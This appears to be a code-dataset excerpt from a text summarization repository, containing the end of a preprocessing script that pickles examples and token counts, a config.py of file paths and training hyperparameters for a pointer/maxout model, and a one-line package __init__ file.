        # CHARACTERS, not tokens — confirm whether iterating
        # word_tokenize(highlight) was intended.
        for token in highlight:
            counter[token] += 1
        examples.append(example)
        # with open('data.json', 'w', encoding='utf-8') as f:
        #     json.dump(example, f, ensure_ascii=False, indent=4)
        # file.close()
with open('dm_examples.pkl', 'wb') as f:
    pickle.dump(examples, f)
with open('dm_counter.pkl', 'wb') as f:
    pickle.dump(counter, f)
|
rezakrimi/MaxoutTextSummarization | config.py | <gh_stars>0
# Paths and hyper-parameters for the pointer/maxout summarization model.
# train file
train_src_file = "./squad/para-train.txt"
train_trg_file = "./squad/tgt-train.txt"
# dev file
dev_src_file = "./squad/para-dev.txt"
dev_trg_file = "./squad/tgt-dev.txt"
# test file
test_src_file = "./squad/para-test.txt"
test_trg_file = "./squad/tgt-test.txt"
# embedding and dictionary file
embedding = "./data/embedding.pkl"
word2idx_file = "./data/word2idx.pkl"
model_path = "./save/model.pt"
device = "cuda:1"
use_gpu = True
debug = False
vocab_size = 45000
freeze_embedding = True
# Training hyper-parameters.
num_epochs = 20
max_len = 400
num_layers = 2
hidden_size = 300
embedding_size = 300
lr = 0.1
batch_size = 6
dropout = 0.3
max_grad_norm = 5.0
use_pointer = True
# Beam-search decoding settings.
beam_size = 10
min_decode_step = 8
max_decode_step = 100
output_dir = "./result/pointer_maxout_ans"
|
rezakrimi/MaxoutTextSummarization | qgevalcap/__init__.py | __author__ = 'xinya'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.